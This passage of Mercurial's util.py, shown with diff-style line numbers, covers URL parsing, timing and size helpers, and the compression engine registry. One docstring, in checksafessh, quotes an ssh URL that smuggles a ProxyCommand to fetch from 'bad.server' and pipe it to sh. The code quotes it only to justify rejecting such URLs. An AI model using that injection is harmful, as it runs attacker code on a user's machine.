2689 2691 >>> url('http://host/a?b#c', parsequery=False, parsefragment=False)
2690 2692 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2691 2693
2692 2694 Empty path:
2693 2695
2694 2696 >>> url('')
2695 2697 <url path: ''>
2696 2698 >>> url('#a')
2697 2699 <url path: '', fragment: 'a'>
2698 2700 >>> url('http://host/')
2699 2701 <url scheme: 'http', host: 'host', path: ''>
2700 2702 >>> url('http://host/#a')
2701 2703 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2702 2704
2703 2705 Only scheme:
2704 2706
2705 2707 >>> url('http:')
2706 2708 <url scheme: 'http'>
2707 2709 """
2708 2710
2709 2711 _safechars = "!~*'()+"
2710 2712 _safepchars = "/!~*'()+:\\"
2711 2713 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2712 2714
2713 2715 def __init__(self, path, parsequery=True, parsefragment=True):
2714 2716 # We slowly chomp away at path until we have only the path left
2715 2717 self.scheme = self.user = self.passwd = self.host = None
2716 2718 self.port = self.path = self.query = self.fragment = None
2717 2719 self._localpath = True
2718 2720 self._hostport = ''
2719 2721 self._origpath = path
2720 2722
2721 2723 if parsefragment and '#' in path:
2722 2724 path, self.fragment = path.split('#', 1)
2723 2725
2724 2726 # special case for Windows drive letters and UNC paths
2725 2727 if hasdriveletter(path) or path.startswith('\\\\'):
2726 2728 self.path = path
2727 2729 return
2728 2730
2729 2731 # For compatibility reasons, we can't handle bundle paths as
2730 2732 # normal URLS
2731 2733 if path.startswith('bundle:'):
2732 2734 self.scheme = 'bundle'
2733 2735 path = path[7:]
2734 2736 if path.startswith('//'):
2735 2737 path = path[2:]
2736 2738 self.path = path
2737 2739 return
2738 2740
2739 2741 if self._matchscheme(path):
2740 2742 parts = path.split(':', 1)
2741 2743 if parts[0]:
2742 2744 self.scheme, path = parts
2743 2745 self._localpath = False
2744 2746
2745 2747 if not path:
2746 2748 path = None
2747 2749 if self._localpath:
2748 2750 self.path = ''
2749 2751 return
2750 2752 else:
2751 2753 if self._localpath:
2752 2754 self.path = path
2753 2755 return
2754 2756
2755 2757 if parsequery and '?' in path:
2756 2758 path, self.query = path.split('?', 1)
2757 2759 if not path:
2758 2760 path = None
2759 2761 if not self.query:
2760 2762 self.query = None
2761 2763
2762 2764 # // is required to specify a host/authority
2763 2765 if path and path.startswith('//'):
2764 2766 parts = path[2:].split('/', 1)
2765 2767 if len(parts) > 1:
2766 2768 self.host, path = parts
2767 2769 else:
2768 2770 self.host = parts[0]
2769 2771 path = None
2770 2772 if not self.host:
2771 2773 self.host = None
2772 2774 # path of file:///d is /d
2773 2775 # path of file:///d:/ is d:/, not /d:/
2774 2776 if path and not hasdriveletter(path):
2775 2777 path = '/' + path
2776 2778
2777 2779 if self.host and '@' in self.host:
2778 2780 self.user, self.host = self.host.rsplit('@', 1)
2779 2781 if ':' in self.user:
2780 2782 self.user, self.passwd = self.user.split(':', 1)
2781 2783 if not self.host:
2782 2784 self.host = None
2783 2785
2784 2786 # Don't split on colons in IPv6 addresses without ports
2785 2787 if (self.host and ':' in self.host and
2786 2788 not (self.host.startswith('[') and self.host.endswith(']'))):
2787 2789 self._hostport = self.host
2788 2790 self.host, self.port = self.host.rsplit(':', 1)
2789 2791 if not self.host:
2790 2792 self.host = None
2791 2793
2792 2794 if (self.host and self.scheme == 'file' and
2793 2795 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2794 2796 raise Abort(_('file:// URLs can only refer to localhost'))
2795 2797
2796 2798 self.path = path
2797 2799
2798 2800 # leave the query string escaped
2799 2801 for a in ('user', 'passwd', 'host', 'port',
2800 2802 'path', 'fragment'):
2801 2803 v = getattr(self, a)
2802 2804 if v is not None:
2803 2805 setattr(self, a, urlreq.unquote(v))
2804 2806
2805 2807 def __repr__(self):
2806 2808 attrs = []
2807 2809 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2808 2810 'query', 'fragment'):
2809 2811 v = getattr(self, a)
2810 2812 if v is not None:
2811 2813 attrs.append('%s: %r' % (a, v))
2812 2814 return '<url %s>' % ', '.join(attrs)
2813 2815
2814 2816 def __bytes__(self):
2815 2817 r"""Join the URL's components back into a URL string.
2816 2818
2817 2819 Examples:
2818 2820
2819 2821 >>> str(url('http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2820 2822 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2821 2823 >>> str(url('http://user:pw@host:80/?foo=bar&baz=42'))
2822 2824 'http://user:pw@host:80/?foo=bar&baz=42'
2823 2825 >>> str(url('http://user:pw@host:80/?foo=bar%3dbaz'))
2824 2826 'http://user:pw@host:80/?foo=bar%3dbaz'
2825 2827 >>> str(url('ssh://user:pw@[::1]:2200//home/joe#'))
2826 2828 'ssh://user:pw@[::1]:2200//home/joe#'
2827 2829 >>> str(url('http://localhost:80//'))
2828 2830 'http://localhost:80//'
2829 2831 >>> str(url('http://localhost:80/'))
2830 2832 'http://localhost:80/'
2831 2833 >>> str(url('http://localhost:80'))
2832 2834 'http://localhost:80/'
2833 2835 >>> str(url('bundle:foo'))
2834 2836 'bundle:foo'
2835 2837 >>> str(url('bundle://../foo'))
2836 2838 'bundle:../foo'
2837 2839 >>> str(url('path'))
2838 2840 'path'
2839 2841 >>> str(url('file:///tmp/foo/bar'))
2840 2842 'file:///tmp/foo/bar'
2841 2843 >>> str(url('file:///c:/tmp/foo/bar'))
2842 2844 'file:///c:/tmp/foo/bar'
2843 2845 >>> print url(r'bundle:foo\bar')
2844 2846 bundle:foo\bar
2845 2847 >>> print url(r'file:///D:\data\hg')
2846 2848 file:///D:\data\hg
2847 2849 """
2848 2850 if self._localpath:
2849 2851 s = self.path
2850 2852 if self.scheme == 'bundle':
2851 2853 s = 'bundle:' + s
2852 2854 if self.fragment:
2853 2855 s += '#' + self.fragment
2854 2856 return s
2855 2857
2856 2858 s = self.scheme + ':'
2857 2859 if self.user or self.passwd or self.host:
2858 2860 s += '//'
2859 2861 elif self.scheme and (not self.path or self.path.startswith('/')
2860 2862 or hasdriveletter(self.path)):
2861 2863 s += '//'
2862 2864 if hasdriveletter(self.path):
2863 2865 s += '/'
2864 2866 if self.user:
2865 2867 s += urlreq.quote(self.user, safe=self._safechars)
2866 2868 if self.passwd:
2867 2869 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2868 2870 if self.user or self.passwd:
2869 2871 s += '@'
2870 2872 if self.host:
2871 2873 if not (self.host.startswith('[') and self.host.endswith(']')):
2872 2874 s += urlreq.quote(self.host)
2873 2875 else:
2874 2876 s += self.host
2875 2877 if self.port:
2876 2878 s += ':' + urlreq.quote(self.port)
2877 2879 if self.host:
2878 2880 s += '/'
2879 2881 if self.path:
2880 2882 # TODO: similar to the query string, we should not unescape the
2881 2883 # path when we store it, the path might contain '%2f' = '/',
2882 2884 # which we should *not* escape.
2883 2885 s += urlreq.quote(self.path, safe=self._safepchars)
2884 2886 if self.query:
2885 2887 # we store the query in escaped form.
2886 2888 s += '?' + self.query
2887 2889 if self.fragment is not None:
2888 2890 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2889 2891 return s
2890 2892
2891 2893 __str__ = encoding.strmethod(__bytes__)
2892 2894
2893 2895 def authinfo(self):
2894 2896 user, passwd = self.user, self.passwd
2895 2897 try:
2896 2898 self.user, self.passwd = None, None
2897 2899 s = bytes(self)
2898 2900 finally:
2899 2901 self.user, self.passwd = user, passwd
2900 2902 if not self.user:
2901 2903 return (s, None)
2902 2904 # authinfo[1] is passed to urllib2 password manager, and its
2903 2905 # URIs must not contain credentials. The host is passed in the
2904 2906 # URIs list because Python < 2.4.3 uses only that to search for
2905 2907 # a password.
2906 2908 return (s, (None, (s, self.host),
2907 2909 self.user, self.passwd or ''))
2908 2910
2909 2911 def isabs(self):
2910 2912 if self.scheme and self.scheme != 'file':
2911 2913 return True # remote URL
2912 2914 if hasdriveletter(self.path):
2913 2915 return True # absolute for our purposes - can't be joined()
2914 2916 if self.path.startswith(br'\\'):
2915 2917 return True # Windows UNC path
2916 2918 if self.path.startswith('/'):
2917 2919 return True # POSIX-style
2918 2920 return False
2919 2921
2920 2922 def localpath(self):
2921 2923 if self.scheme == 'file' or self.scheme == 'bundle':
2922 2924 path = self.path or '/'
2923 2925 # For Windows, we need to promote hosts containing drive
2924 2926 # letters to paths with drive letters.
2925 2927 if hasdriveletter(self._hostport):
2926 2928 path = self._hostport + '/' + self.path
2927 2929 elif (self.host is not None and self.path
2928 2930 and not hasdriveletter(path)):
2929 2931 path = '/' + path
2930 2932 return path
2931 2933 return self._origpath
2932 2934
2933 2935 def islocal(self):
2934 2936 '''whether localpath will return something that posixfile can open'''
2935 2937 return (not self.scheme or self.scheme == 'file'
2936 2938 or self.scheme == 'bundle')
2937 2939
2938 2940 def hasscheme(path):
2939 2941 return bool(url(path).scheme)
2940 2942
2941 2943 def hasdriveletter(path):
2942 2944 return path and path[1:2] == ':' and path[0:1].isalpha()
2943 2945
2944 2946 def urllocalpath(path):
2945 2947 return url(path, parsequery=False, parsefragment=False).localpath()
2946 2948
2947 2949 def checksafessh(path):
2948 2950 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2949 2951
2950 2952 This is a sanity check for ssh urls. ssh will parse the first item as
2951 2953 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2952 2954 Let's prevent these potentially exploited urls entirely and warn the
2953 2955 user.
2954 2956
2955 2957 Raises an error.Abort when the url is unsafe.
2956 2958 """
2957 2959 path = urlreq.unquote(path)
2958 2960 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2959 2961 raise error.Abort(_('potentially unsafe url: %r') %
2960 2962 (path,))
2961 2963
2962 2964 def hidepassword(u):
2963 2965 '''hide user credential in a url string'''
2964 2966 u = url(u)
2965 2967 if u.passwd:
2966 2968 u.passwd = '***'
2967 2969 return bytes(u)
2968 2970
2969 2971 def removeauth(u):
2970 2972 '''remove all authentication information from a url string'''
2971 2973 u = url(u)
2972 2974 u.user = u.passwd = None
2973 2975 return str(u)
2974 2976
2975 2977 timecount = unitcountfn(
2976 2978 (1, 1e3, _('%.0f s')),
2977 2979 (100, 1, _('%.1f s')),
2978 2980 (10, 1, _('%.2f s')),
2979 2981 (1, 1, _('%.3f s')),
2980 2982 (100, 0.001, _('%.1f ms')),
2981 2983 (10, 0.001, _('%.2f ms')),
2982 2984 (1, 0.001, _('%.3f ms')),
2983 2985 (100, 0.000001, _('%.1f us')),
2984 2986 (10, 0.000001, _('%.2f us')),
2985 2987 (1, 0.000001, _('%.3f us')),
2986 2988 (100, 0.000000001, _('%.1f ns')),
2987 2989 (10, 0.000000001, _('%.2f ns')),
2988 2990 (1, 0.000000001, _('%.3f ns')),
2989 2991 )
2990 2992
2991 2993 _timenesting = [0]
2992 2994
2993 2995 def timed(func):
2994 2996 '''Report the execution time of a function call to stderr.
2995 2997
2996 2998 During development, use as a decorator when you need to measure
2997 2999 the cost of a function, e.g. as follows:
2998 3000
2999 3001 @util.timed
3000 3002 def foo(a, b, c):
3001 3003 pass
3002 3004 '''
3003 3005
3004 3006 def wrapper(*args, **kwargs):
3005 3007 start = timer()
3006 3008 indent = 2
3007 3009 _timenesting[0] += indent
3008 3010 try:
3009 3011 return func(*args, **kwargs)
3010 3012 finally:
3011 3013 elapsed = timer() - start
3012 3014 _timenesting[0] -= indent
3013 3015 stderr.write('%s%s: %s\n' %
3014 3016 (' ' * _timenesting[0], func.__name__,
3015 3017 timecount(elapsed)))
3016 3018 return wrapper
3017 3019
3018 3020 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3019 3021 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3020 3022
3021 3023 def sizetoint(s):
3022 3024 '''Convert a space specifier to a byte count.
3023 3025
3024 3026 >>> sizetoint('30')
3025 3027 30
3026 3028 >>> sizetoint('2.2kb')
3027 3029 2252
3028 3030 >>> sizetoint('6M')
3029 3031 6291456
3030 3032 '''
3031 3033 t = s.strip().lower()
3032 3034 try:
3033 3035 for k, u in _sizeunits:
3034 3036 if t.endswith(k):
3035 3037 return int(float(t[:-len(k)]) * u)
3036 3038 return int(t)
3037 3039 except ValueError:
3038 3040 raise error.ParseError(_("couldn't parse size: %s") % s)
3039 3041
3040 3042 class hooks(object):
3041 3043 '''A collection of hook functions that can be used to extend a
3042 3044 function's behavior. Hooks are called in lexicographic order,
3043 3045 based on the names of their sources.'''
3044 3046
3045 3047 def __init__(self):
3046 3048 self._hooks = []
3047 3049
3048 3050 def add(self, source, hook):
3049 3051 self._hooks.append((source, hook))
3050 3052
3051 3053 def __call__(self, *args):
3052 3054 self._hooks.sort(key=lambda x: x[0])
3053 3055 results = []
3054 3056 for source, hook in self._hooks:
3055 3057 results.append(hook(*args))
3056 3058 return results
3057 3059
3058 3060 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3059 3061 '''Yields lines for a nicely formatted stacktrace.
3060 3062 Skips the 'skip' last entries, then return the last 'depth' entries.
3061 3063 Each file+linenumber is formatted according to fileline.
3062 3064 Each line is formatted according to line.
3063 3065 If line is None, it yields:
3064 3066 length of longest filepath+line number,
3065 3067 filepath+linenumber,
3066 3068 function
3067 3069
3068 3070 Not be used in production code but very convenient while developing.
3069 3071 '''
3070 3072 entries = [(fileline % (fn, ln), func)
3071 3073 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3072 3074 ][-depth:]
3073 3075 if entries:
3074 3076 fnmax = max(len(entry[0]) for entry in entries)
3075 3077 for fnln, func in entries:
3076 3078 if line is None:
3077 3079 yield (fnmax, fnln, func)
3078 3080 else:
3079 3081 yield line % (fnmax, fnln, func)
3080 3082
3081 3083 def debugstacktrace(msg='stacktrace', skip=0,
3082 3084 f=stderr, otherf=stdout, depth=0):
3083 3085 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3084 3086 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3085 3087 By default it will flush stdout first.
3086 3088 It can be used everywhere and intentionally does not require an ui object.
3087 3089 Not be used in production code but very convenient while developing.
3088 3090 '''
3089 3091 if otherf:
3090 3092 otherf.flush()
3091 3093 f.write('%s at:\n' % msg.rstrip())
3092 3094 for line in getstackframes(skip + 1, depth=depth):
3093 3095 f.write(line)
3094 3096 f.flush()
3095 3097
3096 3098 class dirs(object):
3097 3099 '''a multiset of directory names from a dirstate or manifest'''
3098 3100
3099 3101 def __init__(self, map, skip=None):
3100 3102 self._dirs = {}
3101 3103 addpath = self.addpath
3102 3104 if safehasattr(map, 'iteritems') and skip is not None:
3103 3105 for f, s in map.iteritems():
3104 3106 if s[0] != skip:
3105 3107 addpath(f)
3106 3108 else:
3107 3109 for f in map:
3108 3110 addpath(f)
3109 3111
3110 3112 def addpath(self, path):
3111 3113 dirs = self._dirs
3112 3114 for base in finddirs(path):
3113 3115 if base in dirs:
3114 3116 dirs[base] += 1
3115 3117 return
3116 3118 dirs[base] = 1
3117 3119
3118 3120 def delpath(self, path):
3119 3121 dirs = self._dirs
3120 3122 for base in finddirs(path):
3121 3123 if dirs[base] > 1:
3122 3124 dirs[base] -= 1
3123 3125 return
3124 3126 del dirs[base]
3125 3127
3126 3128 def __iter__(self):
3127 3129 return iter(self._dirs)
3128 3130
3129 3131 def __contains__(self, d):
3130 3132 return d in self._dirs
3131 3133
3132 3134 if safehasattr(parsers, 'dirs'):
3133 3135 dirs = parsers.dirs
3134 3136
3135 3137 def finddirs(path):
3136 3138 pos = path.rfind('/')
3137 3139 while pos != -1:
3138 3140 yield path[:pos]
3139 3141 pos = path.rfind('/', 0, pos)
3140 3142
3141 3143 # compression code
3142 3144
3143 3145 SERVERROLE = 'server'
3144 3146 CLIENTROLE = 'client'
3145 3147
3146 3148 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3147 3149 (u'name', u'serverpriority',
3148 3150 u'clientpriority'))
3149 3151
3150 3152 class compressormanager(object):
3151 3153 """Holds registrations of various compression engines.
3152 3154
3153 3155 This class essentially abstracts the differences between compression
3154 3156 engines to allow new compression formats to be added easily, possibly from
3155 3157 extensions.
3156 3158
3157 3159 Compressors are registered against the global instance by calling its
3158 3160 ``register()`` method.
3159 3161 """
3160 3162 def __init__(self):
3161 3163 self._engines = {}
3162 3164 # Bundle spec human name to engine name.
3163 3165 self._bundlenames = {}
3164 3166 # Internal bundle identifier to engine name.
3165 3167 self._bundletypes = {}
3166 3168 # Revlog header to engine name.
3167 3169 self._revlogheaders = {}
3168 3170 # Wire proto identifier to engine name.
3169 3171 self._wiretypes = {}
3170 3172
3171 3173 def __getitem__(self, key):
3172 3174 return self._engines[key]
3173 3175
3174 3176 def __contains__(self, key):
3175 3177 return key in self._engines
3176 3178
3177 3179 def __iter__(self):
3178 3180 return iter(self._engines.keys())
3179 3181
3180 3182 def register(self, engine):
3181 3183 """Register a compression engine with the manager.
3182 3184
3183 3185 The argument must be a ``compressionengine`` instance.
3184 3186 """
3185 3187 if not isinstance(engine, compressionengine):
3186 3188 raise ValueError(_('argument must be a compressionengine'))
3187 3189
3188 3190 name = engine.name()
3189 3191
3190 3192 if name in self._engines:
3191 3193 raise error.Abort(_('compression engine %s already registered') %
3192 3194 name)
3193 3195
3194 3196 bundleinfo = engine.bundletype()
3195 3197 if bundleinfo:
3196 3198 bundlename, bundletype = bundleinfo
3197 3199
3198 3200 if bundlename in self._bundlenames:
3199 3201 raise error.Abort(_('bundle name %s already registered') %
3200 3202 bundlename)
3201 3203 if bundletype in self._bundletypes:
3202 3204 raise error.Abort(_('bundle type %s already registered by %s') %
3203 3205 (bundletype, self._bundletypes[bundletype]))
3204 3206
3205 3207 # No external facing name declared.
3206 3208 if bundlename:
3207 3209 self._bundlenames[bundlename] = name
3208 3210
3209 3211 self._bundletypes[bundletype] = name
3210 3212
3211 3213 wiresupport = engine.wireprotosupport()
3212 3214 if wiresupport:
3213 3215 wiretype = wiresupport.name
3214 3216 if wiretype in self._wiretypes:
3215 3217 raise error.Abort(_('wire protocol compression %s already '
3216 3218 'registered by %s') %
3217 3219 (wiretype, self._wiretypes[wiretype]))
3218 3220
3219 3221 self._wiretypes[wiretype] = name
3220 3222
3221 3223 revlogheader = engine.revlogheader()
3222 3224 if revlogheader and revlogheader in self._revlogheaders:
3223 3225 raise error.Abort(_('revlog header %s already registered by %s') %
3224 3226 (revlogheader, self._revlogheaders[revlogheader]))
3225 3227
3226 3228 if revlogheader:
3227 3229 self._revlogheaders[revlogheader] = name
3228 3230
3229 3231 self._engines[name] = engine
3230 3232
3231 3233 @property
3232 3234 def supportedbundlenames(self):
3233 3235 return set(self._bundlenames.keys())
3234 3236
3235 3237 @property
3236 3238 def supportedbundletypes(self):
3237 3239 return set(self._bundletypes.keys())
3238 3240
3239 3241 def forbundlename(self, bundlename):
3240 3242 """Obtain a compression engine registered to a bundle name.
3241 3243
3242 3244 Will raise KeyError if the bundle type isn't registered.
3243 3245
3244 3246 Will abort if the engine is known but not available.
3245 3247 """
3246 3248 engine = self._engines[self._bundlenames[bundlename]]
3247 3249 if not engine.available():
3248 3250 raise error.Abort(_('compression engine %s could not be loaded') %
3249 3251 engine.name())
3250 3252 return engine
3251 3253
3252 3254 def forbundletype(self, bundletype):
3253 3255 """Obtain a compression engine registered to a bundle type.
3254 3256
3255 3257 Will raise KeyError if the bundle type isn't registered.
3256 3258
3257 3259 Will abort if the engine is known but not available.
3258 3260 """
3259 3261 engine = self._engines[self._bundletypes[bundletype]]
3260 3262 if not engine.available():
3261 3263 raise error.Abort(_('compression engine %s could not be loaded') %
3262 3264 engine.name())
3263 3265 return engine
3264 3266
3265 3267 def supportedwireengines(self, role, onlyavailable=True):
3266 3268 """Obtain compression engines that support the wire protocol.
3267 3269
3268 3270 Returns a list of engines in prioritized order, most desired first.
3269 3271
3270 3272 If ``onlyavailable`` is set, filter out engines that can't be
3271 3273 loaded.
3272 3274 """
3273 3275 assert role in (SERVERROLE, CLIENTROLE)
3274 3276
3275 3277 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3276 3278
3277 3279 engines = [self._engines[e] for e in self._wiretypes.values()]
3278 3280 if onlyavailable:
3279 3281 engines = [e for e in engines if e.available()]
3280 3282
3281 3283 def getkey(e):
3282 3284 # Sort first by priority, highest first. In case of tie, sort
3283 3285 # alphabetically. This is arbitrary, but ensures output is
3284 3286 # stable.
3285 3287 w = e.wireprotosupport()
3286 3288 return -1 * getattr(w, attr), w.name
3287 3289
3288 3290 return list(sorted(engines, key=getkey))
3289 3291
3290 3292 def forwiretype(self, wiretype):
3291 3293 engine = self._engines[self._wiretypes[wiretype]]
3292 3294 if not engine.available():
3293 3295 raise error.Abort(_('compression engine %s could not be loaded') %
3294 3296 engine.name())
3295 3297 return engine
3296 3298
3297 3299 def forrevlogheader(self, header):
3298 3300 """Obtain a compression engine registered to a revlog header.
3299 3301
3300 3302 Will raise KeyError if the revlog header value isn't registered.
3301 3303 """
3302 3304 return self._engines[self._revlogheaders[header]]
3303 3305
3304 3306 compengines = compressormanager()
3305 3307
3306 3308 class compressionengine(object):
3307 3309 """Base class for compression engines.
3308 3310
3309 3311 Compression engines must implement the interface defined by this class.
3310 3312 """
3311 3313 def name(self):
3312 3314 """Returns the name of the compression engine.
3313 3315
3314 3316 This is the key the engine is registered under.
3315 3317
3316 3318 This method must be implemented.
3317 3319 """
3318 3320 raise NotImplementedError()
3319 3321
3320 3322 def available(self):
3321 3323 """Whether the compression engine is available.
3322 3324
3323 3325 The intent of this method is to allow optional compression engines
3324 3326 that may not be available in all installations (such as engines relying
3325 3327 on C extensions that may not be present).
3326 3328 """
3327 3329 return True
3328 3330
3329 3331 def bundletype(self):
3330 3332 """Describes bundle identifiers for this engine.
3331 3333
3332 3334 If this compression engine isn't supported for bundles, returns None.
3333 3335
3334 3336 If this engine can be used for bundles, returns a 2-tuple of strings of
3335 3337 the user-facing "bundle spec" compression name and an internal
3336 3338 identifier used to denote the compression format within bundles. To
3337 3339 exclude the name from external usage, set the first element to ``None``.
3338 3340
3339 3341 If bundle compression is supported, the class must also implement
3340 3342 ``compressstream`` and `decompressorreader``.
3341 3343
3342 3344 The docstring of this method is used in the help system to tell users
3343 3345 about this engine.
3344 3346 """
3345 3347 return None
3346 3348
3347 3349 def wireprotosupport(self):
3348 3350 """Declare support for this compression format on the wire protocol.
3349 3351
3350 3352 If this compression engine isn't supported for compressing wire
3351 3353 protocol payloads, returns None.
3352 3354
3353 3355 Otherwise, returns ``compenginewireprotosupport`` with the following
3354 3356 fields:
3355 3357
3356 3358 * String format identifier
3357 3359 * Integer priority for the server
3358 3360 * Integer priority for the client
3359 3361
3360 3362 The integer priorities are used to order the advertisement of format
3361 3363 support by server and client. The highest integer is advertised
3362 3364 first. Integers with non-positive values aren't advertised.
3363 3365
3364 3366 The priority values are somewhat arbitrary and only used for default
3365 3367 ordering. The relative order can be changed via config options.
3366 3368
3367 3369 If wire protocol compression is supported, the class must also implement
3368 3370 ``compressstream`` and ``decompressorreader``.
3369 3371 """
3370 3372 return None
3371 3373
3372 3374 def revlogheader(self):
3373 3375 """Header added to revlog chunks that identifies this engine.
3374 3376
3375 3377 If this engine can be used to compress revlogs, this method should
3376 3378 return the bytes used to identify chunks compressed with this engine.
3377 3379 Else, the method should return ``None`` to indicate it does not
3378 3380 participate in revlog compression.
3379 3381 """
3380 3382 return None
3381 3383
3382 3384 def compressstream(self, it, opts=None):
3383 3385 """Compress an iterator of chunks.
3384 3386
3385 3387 The method receives an iterator (ideally a generator) of chunks of
3386 3388 bytes to be compressed. It returns an iterator (ideally a generator)
3387 3389 of bytes of chunks representing the compressed output.
3388 3390
3389 3391 Optionally accepts an argument defining how to perform compression.
3390 3392 Each engine treats this argument differently.
3391 3393 """
3392 3394 raise NotImplementedError()
3393 3395
3394 3396 def decompressorreader(self, fh):
3395 3397 """Perform decompression on a file object.
3396 3398
3397 3399 Argument is an object with a ``read(size)`` method that returns
3398 3400 compressed data. Return value is an object with a ``read(size)`` that
3399 3401 returns uncompressed data.
3400 3402 """
3401 3403 raise NotImplementedError()
3402 3404
3403 3405 def revlogcompressor(self, opts=None):
3404 3406 """Obtain an object that can be used to compress revlog entries.
3405 3407
3406 3408 The object has a ``compress(data)`` method that compresses binary
3407 3409 data. This method returns compressed binary data or ``None`` if
3408 3410 the data could not be compressed (too small, not compressible, etc).
3409 3411 The returned data should have a header uniquely identifying this
3410 3412 compression format so decompression can be routed to this engine.
3411 3413 This header should be identified by the ``revlogheader()`` return
3412 3414 value.
3413 3415
3414 3416 The object has a ``decompress(data)`` method that decompresses
3415 3417 data. The method will only be called if ``data`` begins with
3416 3418 ``revlogheader()``. The method should return the raw, uncompressed
3417 3419 data or raise a ``RevlogError``.
3418 3420
3419 3421 The object is reusable but is not thread safe.
3420 3422 """
3421 3423 raise NotImplementedError()
3422 3424
3423 3425 class _zlibengine(compressionengine):
3424 3426 def name(self):
3425 3427 return 'zlib'
3426 3428
3427 3429 def bundletype(self):
3428 3430 """zlib compression using the DEFLATE algorithm.
3429 3431
3430 3432 All Mercurial clients should support this format. The compression
3431 3433 algorithm strikes a reasonable balance between compression ratio
3432 3434 and size.
3433 3435 """
3434 3436 return 'gzip', 'GZ'
3435 3437
3436 3438 def wireprotosupport(self):
3437 3439 return compewireprotosupport('zlib', 20, 20)
3438 3440
3439 3441 def revlogheader(self):
3440 3442 return 'x'
3441 3443
3442 3444 def compressstream(self, it, opts=None):
3443 3445 opts = opts or {}
3444 3446
3445 3447 z = zlib.compressobj(opts.get('level', -1))
3446 3448 for chunk in it:
3447 3449 data = z.compress(chunk)
3448 3450 # Not all calls to compress emit data. It is cheaper to inspect
3449 3451 # here than to feed empty chunks through generator.
3450 3452 if data:
3451 3453 yield data
3452 3454
3453 3455 yield z.flush()
3454 3456
3455 3457 def decompressorreader(self, fh):
3456 3458 def gen():
3457 3459 d = zlib.decompressobj()
3458 3460 for chunk in filechunkiter(fh):
3459 3461 while chunk:
3460 3462 # Limit output size to limit memory.
3461 3463 yield d.decompress(chunk, 2 ** 18)
3462 3464 chunk = d.unconsumed_tail
3463 3465
3464 3466 return chunkbuffer(gen())
3465 3467
3466 3468 class zlibrevlogcompressor(object):
3467 3469 def compress(self, data):
3468 3470 insize = len(data)
3469 3471 # Caller handles empty input case.
3470 3472 assert insize > 0
3471 3473
3472 3474 if insize < 44:
3473 3475 return None
3474 3476
3475 3477 elif insize <= 1000000:
3476 3478 compressed = zlib.compress(data)
3477 3479 if len(compressed) < insize:
3478 3480 return compressed
3479 3481 return None
3480 3482
3481 3483 # zlib makes an internal copy of the input buffer, doubling
3482 3484 # memory usage for large inputs. So do streaming compression
3483 3485 # on large inputs.
3484 3486 else:
3485 3487 z = zlib.compressobj()
3486 3488 parts = []
3487 3489 pos = 0
3488 3490 while pos < insize:
3489 3491 pos2 = pos + 2**20
3490 3492 parts.append(z.compress(data[pos:pos2]))
3491 3493 pos = pos2
3492 3494 parts.append(z.flush())
3493 3495
3494 3496 if sum(map(len, parts)) < insize:
3495 3497 return ''.join(parts)
3496 3498 return None
3497 3499
3498 3500 def decompress(self, data):
3499 3501 try:
3500 3502 return zlib.decompress(data)
3501 3503 except zlib.error as e:
3502 3504 raise error.RevlogError(_('revlog decompress error: %s') %
3503 3505 str(e))
3504 3506
3505 3507 def revlogcompressor(self, opts=None):
3506 3508 return self.zlibrevlogcompressor()
3507 3509
3508 3510 compengines.register(_zlibengine())
3509 3511
3510 3512 class _bz2engine(compressionengine):
3511 3513 def name(self):
3512 3514 return 'bz2'
3513 3515
3514 3516 def bundletype(self):
3515 3517 """An algorithm that produces smaller bundles than ``gzip``.
3516 3518
3517 3519 All Mercurial clients should support this format.
3518 3520
3519 3521 This engine will likely produce smaller bundles than ``gzip`` but
3520 3522 will be significantly slower, both during compression and
3521 3523 decompression.
3522 3524
3523 3525 If available, the ``zstd`` engine can yield similar or better
3524 3526 compression at much higher speeds.
3525 3527 """
3526 3528 return 'bzip2', 'BZ'
3527 3529
3528 3530 # We declare a protocol name but don't advertise by default because
3529 3531 # it is slow.
3530 3532 def wireprotosupport(self):
3531 3533 return compewireprotosupport('bzip2', 0, 0)
3532 3534
3533 3535 def compressstream(self, it, opts=None):
3534 3536 opts = opts or {}
3535 3537 z = bz2.BZ2Compressor(opts.get('level', 9))
3536 3538 for chunk in it:
3537 3539 data = z.compress(chunk)
3538 3540 if data:
3539 3541 yield data
3540 3542
3541 3543 yield z.flush()
3542 3544
3543 3545 def decompressorreader(self, fh):
3544 3546 def gen():
3545 3547 d = bz2.BZ2Decompressor()
3546 3548 for chunk in filechunkiter(fh):
3547 3549 yield d.decompress(chunk)
3548 3550
3549 3551 return chunkbuffer(gen())
3550 3552
3551 3553 compengines.register(_bz2engine())
3552 3554
3553 3555 class _truncatedbz2engine(compressionengine):
3554 3556 def name(self):
3555 3557 return 'bz2truncated'
3556 3558
3557 3559 def bundletype(self):
3558 3560 return None, '_truncatedBZ'
3559 3561
3560 3562 # We don't implement compressstream because it is hackily handled elsewhere.
3561 3563
3562 3564 def decompressorreader(self, fh):
3563 3565 def gen():
3564 3566 # The input stream doesn't have the 'BZ' header. So add it back.
3565 3567 d = bz2.BZ2Decompressor()
3566 3568 d.decompress('BZ')
3567 3569 for chunk in filechunkiter(fh):
3568 3570 yield d.decompress(chunk)
3569 3571
3570 3572 return chunkbuffer(gen())
3571 3573
3572 3574 compengines.register(_truncatedbz2engine())
3573 3575
3574 3576 class _noopengine(compressionengine):
3575 3577 def name(self):
3576 3578 return 'none'
3577 3579
3578 3580 def bundletype(self):
3579 3581 """No compression is performed.
3580 3582
3581 3583 Use this compression engine to explicitly disable compression.
3582 3584 """
